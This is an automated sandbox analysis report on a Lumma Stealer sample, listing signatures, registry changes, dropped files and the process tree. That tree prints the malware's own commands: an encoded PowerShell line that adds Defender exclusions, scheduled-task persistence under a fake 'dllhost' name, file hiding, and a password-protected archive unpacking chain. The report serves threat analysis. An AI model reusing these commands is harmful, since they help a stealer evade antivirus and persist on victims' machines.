Analysis Overview
SHA256
7da7d152162fd0a796b93b2f28715c50b577ac71a1107b668dc6b2834a5602ba
Threat Level: Known bad
The file [email protected] was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Power Settings
Suspicious use of SetThreadContext
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
Unsigned PE
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Modifies data under HKEY_USERS
Views/modifies file attributes
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-05 16:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:15
Platform
win10-20240404-en
Max time kernel
210s
Max time network
211s
Command Line
Signatures
Lumma Stealer
Downloads MZ/PE file
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4180 set thread context of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz-cyrl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ext.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fi.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ps.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\es.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\et.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\id.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spc.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bg.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ga.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\it.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ar.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tt.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\da.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng2.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-cn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\br.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\yo.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\is.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kaa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\cs.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hi.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ne.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\History.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-tw.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\af.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\cy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\io.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ba.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\readme.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.chm | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\an.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\co.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\he.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\az.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\be.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ro.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sw.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ca.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\el.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\eu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip32.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133646696155449468" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
"C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p1404753551733818025492326517 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "Installer.exe"
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
"Installer.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA=="
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff932369758,0x7ff932369768,0x7ff932369778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2052 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2852 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2860 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5272 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3032 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4592 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
